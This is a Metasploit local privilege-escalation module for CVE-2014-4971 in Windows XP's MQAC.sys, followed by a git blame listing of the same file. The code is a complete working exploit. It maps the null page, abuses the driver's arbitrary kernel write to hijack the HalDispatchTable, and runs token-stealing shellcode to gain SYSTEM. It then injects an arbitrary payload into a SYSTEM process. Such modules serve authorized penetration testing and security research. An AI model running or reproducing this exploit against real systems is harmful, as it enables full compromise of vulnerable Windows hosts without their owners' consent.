modules/exploits/windows/local/mqac_write.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/local/windows_kernel'

class MetasploitModule < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
      'Description'    => %q(
        A vulnerability within the MQAC.sys module allows an attacker to
        overwrite an arbitrary location in kernel memory.

        This module will elevate itself to SYSTEM, then inject the payload
        into another SYSTEM process.
      ),
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Matt Bergin', # original exploit and all the hard work
          'Spencer McIntyre' # MSF module
        ],
      'Arch'           => [ARCH_X86],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'DefaultOptions' =>
        {
          'EXITFUNC'   => 'thread'
        },
      'Targets'        =>
        [
          ['Windows XP SP3',
           {
             'HaliQuerySystemInfo' => 0x16bba,
             '_KPROCESS'  => "\x44",
             '_TOKEN'     => "\xc8",
             '_UPID'      => "\x84",
             '_APLINKS'   => "\x88"
           }
          ]
        ],
      'References'     =>
        [
          ['CVE', '2014-4971'],
          ['EDB', '34112'],
          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
        ],
      'DisclosureDate' => 'Jul 22 2014',
      'DefaultTarget'  => 0,
      'Notes'          =>
        {
          'Stability'   => [ CRASH_OS_RESTARTS, ],
        }
    ))
  end

  # Function borrowed from smart_hashdump
  def get_system_proc
    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
    local_sys = resolve_sid('S-1-5-18')
    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"

    this_pid = session.sys.process.getpid
    # Processes that can Blue Screen a host if migrated in to
    dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
    session.sys.process.processes.each do |p|
      # Check we are not migrating to a process that can BSOD the host
      next if dangerous_processes.include?(p['name'])
      next if p['pid'] == this_pid
      next if p['pid'] == 4
      next if p['user'] != system_account_name
      return p
    end
  end

  def check
    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      print_error('MSMQ installation not found')
      return Exploit::CheckCode::Safe
    end
    session.railgun.kernel32.CloseHandle(handle)

    os = sysinfo['OS']
    case os
    when /windows xp.*service pack 3/i
      return Exploit::CheckCode::Appears
    when /windows xp/i
      vprint_error('Unsupported version of Windows XP detected')
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    if sysinfo['Architecture'] == ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
    end

    if is_system?
      print_error('This meterpreter session is already running as SYSTEM')
      return
    end

    # Running on Windows XP versions that aren't listed in the supported list
    # results in a BSOD and so we should not let that happen.
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, "Exploit not available on this system")
    end

    base_addr = 0xffff
    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return if handle.nil?

    this_proc = session.sys.process.open
    unless this_proc.memory.writable?(base_addr)
      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,
                                                    [0xffff].pack('V'),
                                                    'MEM_COMMIT|MEM_RESERVE',
                                                    'PAGE_EXECUTE_READWRITE')
    end
    unless this_proc.memory.writable?(base_addr)
      print_error('Failed to properly allocate memory')
      this_proc.close
      return
    end

    haldispatchtable = find_haldispatchtable
    return if haldispatchtable.nil?
    print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']

    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
    restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')          # mov dword ptr [nt!HalDispatchTable+0x4], eax

    shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)

    this_proc.memory.write(0x1, shellcode)
    this_proc.close

    print_status('Triggering vulnerable IOCTL')
    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
                                                1, 0x258,
                                                haldispatchtable + 4, 0)
    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

    unless is_system?
      print_error('Did not get system, exploit failed')
      return
    end

    proc = get_system_proc
    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
    unless execute_shellcode(payload.encoded, nil, proc['pid'])
      fail_with(Failure::Unknown, 'Error while executing the payload')
    end
  end
end
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`require 'msf/core/exploit/local/windows_kernel'`
OCD fixes - Spaces 2017-07-14 08:46:59 +01:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Local`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`Rank = AverageRanking`

Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`include Msf::Exploit::Local::WindowsKernel`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`include Msf::Post::Windows::Priv`
Fix a typo and use the execute_shellcode function 2014-07-22 13:06:57 -04:00			`include Msf::Post::Windows::Process`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'Description' => %q(`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`A vulnerability within the MQAC.sys module allows an attacker to`
			`overwrite an arbitrary location in kernel memory.`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
			`This module will elevate itself to SYSTEM, then inject the payload`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`into another SYSTEM process.`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`),`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Matt Bergin', # original exploit and all the hard work`
			`'Spencer McIntyre' # MSF module`
			`],`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'Arch' => [ARCH_X86],`
			`'Platform' => ['win'],`
			`'SessionTypes' => ['meterpreter'],`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`'DefaultOptions' =>`
			`{`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'EXITFUNC' => 'thread'`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`},`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`'Targets' =>`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`[`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`['Windows XP SP3',`
			`{`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`'HaliQuerySystemInfo' => 0x16bba,`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'_KPROCESS' => "\x44",`
			`'_TOKEN' => "\xc8",`
			`'_UPID' => "\x84",`
			`'_APLINKS' => "\x88"`
			`}`
			`]`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`],`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'References' =>`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`[`
Solve conflicts 2014-08-28 10:19:12 -05:00			`['CVE', '2014-4971'],`
			`['EDB', '34112'],`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`],`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'DisclosureDate' => 'Jul 22 2014',`
Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00			`'DefaultTarget' => 0,`
			`'Notes' =>`
			`{`
			`'Stability' => [ CRASH_OS_RESTARTS, ],`
			`}`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`))`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`

			`# Function borrowed from smart_hashdump`
			`def get_system_proc`
			`# Make sure you got the correct SYSTEM Account Name no matter the OS Language`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`local_sys = resolve_sid('S-1-5-18')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"`

Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_pid = session.sys.process.getpid`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`# Processes that can Blue Screen a host if migrated in to`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`session.sys.process.processes.each do \|p\|`
			`# Check we are not migrating to a process that can BSOD the host`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`next if dangerous_processes.include?(p['name'])`
			`next if p['pid'] == this_pid`
			`next if p['pid'] == 4`
			`next if p['user'] != system_account_name`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return p`
			`end`
			`end`

Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`def check`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE\|FILE_SHARE_READ', 0, 'OPEN_EXISTING')`
			`if handle.nil?`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`print_error('MSMQ installation not found')`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`return Exploit::CheckCode::Safe`
			`end`
			`session.railgun.kernel32.CloseHandle(handle)`

Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`os = sysinfo['OS']`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`case os`
			`when /windows xp.*service pack 3/i`
			`return Exploit::CheckCode::Appears`
			`when /windows xp/i`
Update local exploit checks to follow the guidelines. 2015-09-01 23:26:45 -05:00			`vprint_error('Unsupported version of Windows XP detected')`
Add a simple check method for cve-2014-4971 2014-07-22 10:54:10 -04:00			`return Exploit::CheckCode::Detected`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`def exploit`
More platform/arch/session fixes 2016-10-29 08:11:20 +10:00			`if sysinfo['Architecture'] == ARCH_X64`
			`fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`

			`if is_system?`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`print_error('This meterpreter session is already running as SYSTEM')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return`
			`end`

rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`# Running on Windows XP versions that aren't listed in the supported list`
			`# results in a BSOD and so we should not let that happen.`
Fix modules broken by @wchen-r7 's `4275a65407` commit. 2016-07-05 11:42:03 +02:00			`if check == Exploit::CheckCode::Safe`
			`fail_with(Failure::NotVulnerable, "Exploit not available on this system")`
			`end`
Add some small fixes to the MQAC local exploit 2014-07-24 14:44:26 +10:00
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`base_addr = 0xffff`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE\|FILE_SHARE_READ', 0, 'OPEN_EXISTING')`
			`return if handle.nil?`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_proc = session.sys.process.open`
			`unless this_proc.memory.writable?(base_addr)`
Moar bad packs 2014-08-15 21:11:37 +01:00			`session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,`
			`[0xffff].pack('V'),`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`'MEM_COMMIT\|MEM_RESERVE',`
			`'PAGE_EXECUTE_READWRITE')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`unless this_proc.memory.writable?(base_addr)`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`print_error('Failed to properly allocate memory')`
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_proc.close`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return`
			`end`

Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`haldispatchtable = find_haldispatchtable`
			`return if haldispatchtable.nil?`
			`print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")`

			`vprint_status('Getting the hal.dll base address...')`
			`hal_info = find_sys_base('hal.dll')`
			`fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?`
			`hal_base = hal_info[0]`
			`vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")`
			`hali_query_system_information = hal_base + target['HaliQuerySystemInfo']`

			`restore_ptrs = "\x31\xc0" # xor eax, eax`
			`restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation`
			`restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax`

			`shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)`
Solve conflicts 2014-08-28 10:19:12 -05:00
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`this_proc.memory.write(0x1, shellcode)`
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`this_proc.close`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`print_status('Triggering vulnerable IOCTL')`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,`
			`1, 0x258,`
Update mqac_write to use the mixin and restore pointers 2014-08-04 12:15:39 -07:00			`haldispatchtable + 4, 0)`
rubocop cleanup, long lines, etc 2014-07-28 22:04:45 -05:00			`session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00
Lots and cleanups based on PR feed back 2014-07-22 14:45:00 -04:00			`unless is_system?`
Minor caps, grammar, desc fixes 2014-08-18 13:35:34 -05:00			`print_error('Did not get system, exploit failed')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`return`
			`end`

Fix a typo and use the execute_shellcode function 2014-07-22 13:06:57 -04:00			`proc = get_system_proc`
			`print_status("Injecting the payload into SYSTEM process: #{proc['name']}")`
			`unless execute_shellcode(payload.encoded, nil, proc['pid'])`
Minor tidies to conform to standards 2014-07-25 09:32:54 +10:00			`fail_with(Failure::Unknown, 'Error while executing the payload')`
First commit of MQAC arbitrary write priv escalation 2014-07-22 10:04:12 -04:00			`end`
			`end`
			`end`